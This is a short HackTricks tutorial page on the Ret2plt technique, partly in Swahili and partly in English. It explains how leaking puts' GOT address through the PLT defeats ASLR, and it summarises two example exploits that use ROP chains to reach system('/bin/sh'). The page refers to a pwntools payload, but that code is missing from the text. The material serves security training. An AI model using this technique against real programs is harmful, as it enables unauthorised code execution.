Ret2plt
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lengo la mbinu hii ni kuvuja anwani kutoka kwa kazi katika PLT ili uweze kupita ASLR. Hii ni kwa sababu ikiwa, kwa mfano, unavuja anwani ya kazi puts kutoka libc, unaweza kisha kuhesabu ambapo msingi wa libc uko na kuhesabu offsets ili kufikia kazi nyingine kama system.
Hii inaweza kufanywa na payload ya pwntools kama (kutoka hapa):
Note how puts (using the address from the PLT) is called with the address of puts located in the GOT (Global Offset Table). This is because by the time puts prints the GOT entry of puts, this entry will contain the exact address of puts in memory.
Also note how the address of main is used in the exploit so when puts ends its execution, the binary calls main again instead of exiting (so the leaked address will continue to be valid).
Note how in order for this to work the binary cannot be compiled with PIE or you must have found a leak to bypass PIE in order to know the address of the PLT, GOT and main. Otherwise, you need to bypass PIE first.
You can find a full example of this bypass here. This was the final exploit from that example:
64 bit, ASLR imewezeshwa lakini hakuna PIE, hatua ya kwanza ni kujaza overflow hadi byte 0x00 ya canary ili kisha kuita puts na leak. Kwa canary, gadget ya ROP inaundwa kuita puts ili leak anwani ya puts kutoka GOT na gadget nyingine ya ROP kuita system('/bin/sh')
64 bits, ASLR imewezeshwa, hakuna canary, stack overflow katika main kutoka kwa kazi ya mtoto. Gadget ya ROP kuita puts ili leak anwani ya puts kutoka GOT na kisha kuita gadget moja.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
